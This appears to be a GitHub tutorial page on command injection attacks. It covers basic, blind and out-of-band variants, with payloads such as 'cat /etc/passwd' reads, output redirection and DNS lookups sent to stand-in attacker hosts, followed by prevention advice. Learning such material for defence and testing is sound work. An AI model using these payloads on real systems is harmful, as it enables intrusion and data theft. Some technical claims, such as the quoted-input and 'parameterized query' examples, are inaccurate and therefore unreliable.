-
Notifications
You must be signed in to change notification settings - Fork 0
Command Injection Attack
Command Injection is a type of web-based attack that allows an attacker to execute arbitrary commands on a server through a vulnerable application. It occurs when an application takes user input and uses it to construct a system command without properly validating or sanitizing the input. The attacker can use this vulnerability to execute arbitrary commands on the server, such as deleting files or gaining root access.
| Purpose of command | Linux | Windows |
|---|---|---|
| Name of current user | whoami | whoami |
| Operating system | uname -a | ver |
| Network configuration | ifconfig | ipconfig /all |
| Network connections | netstat -an | netstat -an |
| Running processes | ps -ef | tasklist |
The simplest form of command injection is when an attacker adds extra commands to the end of the user input. For example, consider a web application that allows a user to search for a book by title. The application constructs a command like this:
$ booksearch 'title'
If the attacker enters the following input into the search field:
title; ls
The resulting command executed on the server would be:
$ booksearch 'title; ls'
This would list the files in the current directory, as well as the search results.
Blind Command Injection is a type of attack where the attacker does not receive the output of the command they inject. This can be used to gather information about the system, such as the operating system version, available ports, or network configuration. Blind Command Injection occurs when the application takes user input and uses it to construct a command, but the output is not returned to the user.
- For example, consider a web application that allows a user to ping a remote server. The application constructs a command like this:
$ ping 'server'
If the attacker enters the following input into the search field:
server; cat /etc/passwd
The resulting command executed on the server would be:
$ ping 'server; cat /etc/passwd'
Although the attacker does not see the output of the cat command, they can determine whether the command was executed successfully by observing changes in the server's behavior.
- example of feedback in the site and send feedback with mail:
mail -s "This site is great" -aFrom:[email protected] [email protected]
The output from the mail command (if any) is not returned in the application's responses, so using the echo payload won't work
so you Detec blind OS command injection using time delays
& ping -c 10 127.0.0.1 &
- Exploiting blind OS command injection by redirecting output
Use Burp Suite to intercept and modify the request that submits feedback. Modify the email parameter, changing it to: email=||whoami>/var/www/images/output.txt|| Now use Burp Suite to intercept and modify the request that loads an image of a product. Modify the filename parameter, changing the value to the name of the file you specified for the output of the injected command: filename=output.txt
Blind Out-of-Band Command Injection is similar to Blind Command Injection, but it does not rely on the application returning output to the user. Instead, the attacker uses a separate communication channel to receive the results of the injected command. This can be done using techniques like DNS resolution or HTTP requests. You can use an injected command that will trigger an out-of-band network interaction with a system that you control, using [OAST] techniques
For example, consider a web application that allows a user to search for a book by title. The application constructs a command like this:
$ booksearch 'title'
If the attacker enters the following input into the search field:
title; ping attacker.com
The resulting command executed on the server would be:
$ booksearch 'title; ping attacker.com'
This would cause the server to send a ping request to the attacker's server, allowing them to see the results of the injected command.
example:
& nslookup whoami.kgji2ohoyw.web-attacker.com &
response:
wwwuser.kgji2ohoyw.web-attacker.com
Use input validation and sanitization to prevent malicious commands from being executed on the server
To prevent Command Injection attacks, developers must properly validate and sanitize user input before using it to construct system commands. This can be done using a variety of techniques, such as input validation, whitelisting, or using parameterized queries.
For example, consider the previous example where a web application allowed a user to search for a book by title. Instead of constructing the command like this:
$ booksearch 'title'
The application should use parameterized queries, like this:
$ booksearch ?
The user input is then passed as a parameter to the query, which prevents the input from being used to construct a system command.
-
Identify where user input is used to construct a system command.
-
Test the input fields with different types of characters, such as quotes, semicolons, and ampersands, to see if the input is being used to construct a command. A number of characters function as command separators, allowing commands to be chained together. The following command separators work on both Windows and Unix-based systems: & && | || The following command separators work only on Unix-based systems: ; Newline (0x0a or \n) On Unix-based systems, you can also use backticks or the dollar character to perform inline execution of an injected command within the original command:
injected command$( injected command ) -
Try to inject commands such as 'ls' or 'cat /etc/passwd' to test for the vulnerability.
-
If the output of the injected command is not visible, try to use blind command injection techniques to gather information about the system.
-
If the application does not return output, try to use blind out-of-band command injection techniques, such as DNS resolution or HTTP requests.
-
Use parameterized queries to prevent user input from being used to construct system commands.
-
Validate and sanitize user input before using it to construct system commands.
-
Limit the privileges of the user account used to execute the system commands.
-
Keep your software up to date with the latest security patches and updates.
-
Conduct regular security audits and penetration testing to identify and fix vulnerabilities before they can be exploited.
-
use burp suit scan to check vulnerability
Tools:
Reference:
Hunting asynchronous vulnerabilities
https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection
https://book.hacktricks.xyz/pentesting-web/command-injection